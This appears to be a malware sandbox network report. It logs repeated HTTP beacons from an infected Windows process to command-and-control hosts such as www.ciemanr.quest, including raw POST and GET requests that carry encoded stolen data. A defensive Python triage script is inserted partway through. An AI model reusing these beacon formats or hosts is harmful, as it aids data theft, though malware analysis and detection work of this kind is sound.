                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.5 | 49889 | 150.109.11.247 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:33.273760080 CET | 755 | OUT | POST /gejp/ HTTP/1.1
                                                                                  Host: www.ciemanr.quest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.ciemanr.quest
                                                                                  Referer: http://www.ciemanr.quest/gejp/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4d 2b 4e 6b 4f 2b 34 56 69 74 30 62 78 30 2b 56 56 4a 43 72 32 46 77 65 68 76 65 62 54 31 36 61 44 6c 74 45 42 79 4c 6e 4f 33 5a 61 4c 4a 6d 4d 6f 78 46 54 36 33 72 56 62 38 35 78 49 7a 56 63 47 61 57 4c 38 76 39 77 71 52 62 64 73 4e 7a 32 4d 76 37 63 30 63 72 43 4b 66 63 43 76 6d 39 37 78 48 6e 6b 52 4b 51 54 57 72 67 49 52 6a 50 39 4a 47 73 37 61 34 2b 72 41 36 7a 31 56 7a 78 6c 47 34 37 6d 4e 4f 58 71 70 72 68 75 31 52 4c 68 6e 66 47 34 62 4f 77 68 52 4f 74 77 35 67 75 55 2f 5a 45 45 69 6b 61 74 64 46 4e 6d 55 57 52 71 58 71 75 48 61 7a 44 47 54 72 44 4a 50 69 57 77 70 73 70 44 32 4b 6b 3d
                                                                                  Data Ascii: LDVlCz=M+NkO+4Vit0bx0+VVJCr2FwehvebT16aDltEByLnO3ZaLJmMoxFT63rVb85xIzVcGaWL8v9wqRbdsNz2Mv7c0crCKfcCvm97xHnkRKQTWrgIRjP9JGs7a4+rA6z1VzxlG47mNOXqprhu1RLhnfG4bOwhROtw5guU/ZEEikatdFNmUWRqXquHazDGTrDJPiWwpspD2Kk=
                                                                                  Dec 12, 2024 00:19:34.830887079 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:19:34 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.5 | 49896 | 150.109.11.247 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:35.938417912 CET | 775 | OUT | POST /gejp/ HTTP/1.1
                                                                                  Host: www.ciemanr.quest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.ciemanr.quest
                                                                                  Referer: http://www.ciemanr.quest/gejp/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4d 2b 4e 6b 4f 2b 34 56 69 74 30 62 77 56 4f 56 51 75 75 72 30 6c 77 64 39 2f 65 62 64 56 37 54 44 6c 78 45 42 32 62 33 4f 6c 4e 61 4c 73 4b 4d 70 77 46 54 30 58 72 56 51 63 35 4f 47 54 56 56 47 61 53 44 38 71 64 77 71 52 6e 64 73 4d 44 32 50 59 58 44 31 4d 72 41 47 2f 63 41 77 57 39 37 78 48 6e 6b 52 4b 45 35 57 72 49 49 52 53 2f 39 49 6b 55 34 53 59 2b 73 44 36 7a 31 52 7a 78 70 47 34 36 31 4e 4c 50 41 70 74 74 75 31 51 37 68 70 74 69 37 4d 65 77 6e 66 75 73 56 2b 6a 79 66 2f 50 45 61 68 48 65 6f 4d 48 46 69 56 67 67 41 4e 49 6d 76 4a 54 76 2b 44 34 4c 2b 65 53 33 5a 7a 50 35 7a 6f 64 78 6a 51 70 2f 52 76 44 75 6d 75 59 63 53 6c 68 59 71 6d 30 58 67
                                                                                  Data Ascii: LDVlCz=M+NkO+4Vit0bwVOVQuur0lwd9/ebdV7TDlxEB2b3OlNaLsKMpwFT0XrVQc5OGTVVGaSD8qdwqRndsMD2PYXD1MrAG/cAwW97xHnkRKE5WrIIRS/9IkU4SY+sD6z1RzxpG461NLPApttu1Q7hpti7MewnfusV+jyf/PEahHeoMHFiVggANImvJTv+D4L+eS3ZzP5zodxjQp/RvDumuYcSlhYqm0Xg
                                                                                  Dec 12, 2024 00:19:37.480165005 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:19:37 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.5 | 49902 | 150.109.11.247 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:38.593681097 CET | 1792 | OUT | POST /gejp/ HTTP/1.1
                                                                                  Host: www.ciemanr.quest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.ciemanr.quest
                                                                                  Referer: http://www.ciemanr.quest/gejp/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4d 2b 4e 6b 4f 2b 34 56 69 74 30 62 77 56 4f 56 51 75 75 72 30 6c 77 64 39 2f 65 62 64 56 37 54 44 6c 78 45 42 32 62 33 4f 6c 56 61 4c 61 65 4d 6f 54 39 54 31 58 72 56 5a 38 35 31 47 54 55 58 47 63 36 48 38 71 5a 47 71 58 72 64 2b 65 4c 32 45 4b 76 44 67 63 72 41 62 50 63 42 76 6d 39 55 78 42 48 6f 52 4b 55 35 57 72 49 49 52 51 6e 39 42 57 73 34 55 59 2b 72 41 36 7a 68 56 7a 78 4e 47 34 6a 41 4e 4c 44 36 70 64 4e 75 31 77 72 68 6b 2f 36 37 50 2b 77 6c 53 4f 73 33 2b 6a 2f 48 2f 50 77 57 68 45 44 48 4d 46 56 69 58 31 46 68 56 49 2b 30 49 41 6a 5a 4e 50 43 53 66 58 50 59 74 4a 6f 44 74 4b 68 2f 4d 36 48 64 6d 31 53 34 6e 63 5a 35 7a 46 74 35 69 41 69 70 62 75 6f 43 56 6d 72 49 42 69 36 41 55 7a 4c 45 43 67 70 43 6e 73 51 42 68 75 34 37 62 53 6b 35 34 75 51 61 78 45 38 5a 64 36 35 4d 32 38 30 52 6b 2f 7a 7a 7a 56 51 78 2b 4f 74 42 76 2f 6e 6c 44 41 61 6c 38 48 72 2f 70 46 73 6c 55 53 6d 55 42 31 64 61 6d 4e 56 6f 35 31 7a 79 47 75 35 47 56 4b 66 4e 46 4b 54 69 49 30 43 64 43 6a 38 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=M+NkO+4Vit0bwVOVQuur0lwd9/ebdV7TDlxEB2b3OlVaLaeMoT9T1XrVZ851GTUXGc6H8qZGqXrd+eL2EKvDgcrAbPcBvm9UxBHoRKU5WrIIRQn9BWs4UY+rA6zhVzxNG4jANLD6pdNu1wrhk/67P+wlSOs3+j/H/PwWhEDHMFViX1FhVI+0IAjZNPCSfXPYtJoDtKh/M6Hdm1S4ncZ5zFt5iAipbuoCVmrIBi6AUzLECgpCnsQBhu47bSk54uQaxE8Zd65M280Rk/zzzVQx+OtBv/nlDAal8Hr/pFslUSmUB1damNVo51zyGu5GVKfNFKTiI0CdCj82+meHm5vUMMD95FxCF77VPg0zLN3kfjJcPj9oqNMuSZuFq9hyPbxfW9yidqJ90qu+yIQRvc9IxdAsX8gBRsmiWH7y5cr3zQ/ns5eBP/ytJJhVbXC8PVdrPldAf9j7vA260ZuXG1sv6526su0YM3PxJ4ZH0pSL2GWlNWrlzwV/yGfVyw2PEKz3knEo2Z7h913lKy8i1+9QiYxsiMo7DdT6Vil+art3EFDtrUxV9qtpCsS0I77Krh2m1JokiZQrUkA1lFbXlnVYwoCbCrjwyISbZNpi4YpgZ82MP7HRcfUhc6mMGHQwJEze0ZOX8SwQBrUMGJ0SYOsN9zB2PeFSXRZPJBosAg76ZlC22CL2sQSR49mND4xd0u376+ejqYAuP/rI6WE8eSpwiMyT1q+fbdPSdHFvs5frWtNyeBZUTo+EK21Ss8CYW9Xv7DhRgLu1JDmMjon+bv38CmPVkln+ZNdGevnqh/RxWYEtwdEBepXfUCF8QIJZmkbdsTy2nQialtAVqvtqnUG+K0AjsijbhYelGjno5Vu3CUzLECB9VMJPkaxH8rsT8onukoyoM4XxwcfoDyQ+R2l+R7SCZ3Tr3QcBCl25cNOv7o6atUK0Y9Th6NTX7tXKOKMYp69NSqlFgm0cghV/fVWuJkPA/fUaPjAP69LQii+HZK6Bu [TRUNCATED]
                                                                                  Dec 12, 2024 00:19:40.287234068 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:19:39 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


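The six sessions above follow one pattern. Each beacon is a POST or GET to a short path on the current C2 host carrying a single parameter with an arbitrary-looking name (LDVlCz) and a base64 blob; every request uses the same fixed Chrome 41 / UBrowser user-agent string; the POSTs add Origin and Referer headers that point at the C2 host itself but carry no Cookie; and the server answers every one of them with a stock nginx/Tengine 404 page. The script below is an added example, not part of the Joe Sandbox report and not FormBook code: it parses raw requests copied from sessions 12 and 13, scores them against heuristics drawn from what these six requests have in common (not from a published signature), measures how far two beacons to the same host agree at the start of their encoded payload, and decodes a Data Raw hex line back into the Data Ascii form used on this page. All sample inputs are copied from the sessions above; the indicator names, the base64 length threshold and the other cut-offs are the example's own choices.

```python
"""Triage of the beacons captured above. Added example, not part of the Joe
Sandbox report or of FormBook: sample inputs are copied from this page, the
indicator names and thresholds are the example's own."""
import base64
import binascii
import re

UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36")
# Constructed from the report: the two POST bodies sent to www.ciemanr.quest
# (sessions 13 and 14) and the GET query sent to www.walkecode.top (session 12).
CIEMANR_POST_1 = "LDVlCz=M+NkO+4Vit0bx0+VVJCr2FwehvebT16aDltEByLnO3ZaLJmMoxFT63rVb85xIzVcGaWL8v9wqRbdsNz2Mv7c0crCKfcCvm97xHnkRKQTWrgIRjP9JGs7a4+rA6z1VzxlG47mNOXqprhu1RLhnfG4bOwhROtw5guU/ZEEikatdFNmUWRqXquHazDGTrDJPiWwpspD2Kk="
CIEMANR_POST_2 = "LDVlCz=M+NkO+4Vit0bwVOVQuur0lwd9/ebdV7TDlxEB2b3OlNaLsKMpwFT0XrVQc5OGTVVGaSD8qdwqRndsMD2PYXD1MrAG/cAwW97xHnkRKE5WrIIRS/9IkU4SY+sD6z1RzxpG461NLPApttu1Q7hpti7MewnfusV+jyf/PEahHeoMHFiVggANImvJTv+D4L+eS3ZzP5zodxjQp/RvDumuYcSlhYqm0Xg"
WALKECODE_GET_QUERY = "LDVlCz=nNC+GBX2ggWuM05tEEqRTuHIkAvcf+dXy/bvByniPoLRj52NglzWV1Nft7BNtL9++4tRfUwg9XmNi4A2kp9kOCOyWvDUT5wtJii7I2tTBBgakefdRMv39WDJ4M987EpnCg==&NdLhG=cLCtFnqPUvutTbuP"

SAMPLE_POST = (
    "POST /gejp/ HTTP/1.1\r\nHost: www.ciemanr.quest\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.9\r\nAccept-Encoding: gzip, deflate, br\r\n"
    "Origin: http://www.ciemanr.quest\r\nReferer: http://www.ciemanr.quest/gejp/\r\n"
    "Content-Length: 207\r\nConnection: close\r\nCache-Control: no-cache\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"User-Agent: {UA}\r\n\r\n{CIEMANR_POST_1}"
)
SAMPLE_GET = (
    f"GET /qei1/?{WALKECODE_GET_QUERY} HTTP/1.1\r\nHost: www.walkecode.top\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
    f"Accept-Language: en-US,en;q=0.9\r\nConnection: close\r\nUser-Agent: {UA}\r\n\r\n"
)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def split_form(data: str) -> list:
    """Split key=value pairs WITHOUT percent-decoding: the captured values carry raw
    '+', '/' and '=' and urllib.parse.parse_qsl would turn the '+' into spaces."""
    pairs = []
    for part in data.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def is_b64_blob(value: str, min_len: int = 32) -> bool:
    """True if value is well-formed base64 of at least min_len characters (threshold is ours)."""
    if len(value) < min_len or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def triage(raw: str) -> list:
    """Return the indicators a request matches; an empty list means nothing matched."""
    req = parse_request(raw)
    h, hits = req["headers"], []
    host, ua = h.get("host", ""), h.get("user-agent", "")
    path, _, query = req["target"].partition("?")
    # 1. Origin and Referer name the destination itself: the request claims to
    #    come from a page on the very host it is beaconing to.
    if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}":
        hits.append("Origin/Referer point back at the destination host")
    # 2. A browser that had really visited the referring page would carry cookies.
    if "referer" in h and "cookie" not in h:
        hits.append("Referer without Cookie")
    # 3. Fixed browser string: a 2015-era Chrome 41 build plus a UBrowser token.
    if "Chrome/41." in ua and "UBrowser/" in ua:
        hits.append("Chrome/41 UBrowser user-agent")
    # 4. Payload shape: first parameter is a short alphanumeric name carrying an
    #    opaque base64 blob (in the body for POST, in the query string for GET).
    params = split_form(req["body"] if req["method"] == "POST" else query)
    if params and re.fullmatch(r"[A-Za-z0-9]{4,10}", params[0][0]) and is_b64_blob(params[0][1]):
        hits.append(f"opaque base64 blob in parameter {params[0][0]}")
    # 5. Raw '+', '/' or '=' inside a value: an HTML form submission percent-encodes
    #    these, so the body was not produced by a real browser form.
    if any(set(v) & set("+/=") for _, v in params):
        hits.append("form values not percent-encoded")
    # 6. Declared Content-Length must match the body actually captured.
    if req["method"] == "POST" and h.get("content-length") != str(len(req["body"].encode("latin-1"))):
        hits.append("Content-Length mismatch")
    return hits


def common_prefix_len(a: str, b: str) -> int:
    """Shared leading run of two encoded payloads. Beacons to the same host on this
    page agree for a while after the parameter name and then diverge; useful for
    clustering, without reading anything into the cipher behind it."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def decode_data_raw(hex_line: str) -> bytes:
    """Turn a 'Data Raw' line of space-separated hex from the report back into bytes."""
    return bytes.fromhex(hex_line.replace(" ", ""))


def to_data_ascii(data: bytes) -> str:
    """Render bytes hexdump-style: printable ASCII as-is, anything else as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)


if __name__ == "__main__":
    for name, raw in (("POST", SAMPLE_POST), ("GET", SAMPLE_GET)):
        print(name, triage(raw))
    print("shared prefix:", common_prefix_len(CIEMANR_POST_1, CIEMANR_POST_2))
    print(to_data_ascii(decode_data_raw("3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e")))
```

Run as `python3 triage.py`: the POST from session 13 matches five of the six indicators and the GET from session 12 matches three (no Origin or Referer is sent on the GETs). The two POSTs to www.ciemanr.quest share their first 19 characters, the parameter name plus twelve characters of payload, and then diverge; the same measurement across hosts stops at the parameter name. The rules are drawn from six requests to two hosts, so treat them as a starting point for a hunt query rather than a finished detection, and keep the Content-Length check: it mostly catches truncated captures rather than malware behaviour.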
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.549911150.109.11.247805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:41.243158102 CET | 504 | OUT | GET /gejp/?LDVlCz=B8lENIMSkdQf4FGQc5K+k257k877TXD8FgVAfBzrbl9XXLWxyw5ahRnSZIhzPxA1TMan6vpZ6mPmpcnGRYODwaH5MOJowBwrmH/nBLcALJg/EQzrJ0QQeK+YBPbGWQ4zHw==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.ciemanr.quest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:19:42.777731895 CET | 708 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:19:42 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  17 | 192.168.2.5 | 49929 | 173.208.249.155 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:48.903033972 CET | 758 | OUT | POST /1h7d/ HTTP/1.1
                                                                                  Host: www.growbamboo.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.growbamboo.xyz
                                                                                  Referer: http://www.growbamboo.xyz/1h7d/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Ascii: LDVlCz=Lj90mIgV26FPbxqexIckBCv285u63tJe34SlneZiWdRp1pjjs0JFAnE4wmZYPQYxV8ND5F08o0mwNT1VpC7R4WBdlWYSoS1OAH6002Y4igMuiWrrsdUKpiMgZQuwTuMBAXecJZmhgNC+tV2UMNyV+Dr4IBBMs07jxMAh7qswvyby7LDjcBTNgy6cjwRsV5fojxNGc9c=
                                                                                  Dec 12, 2024 00:19:50.045525074 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:19:49 GMT
                                                                                  Server: Apache
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
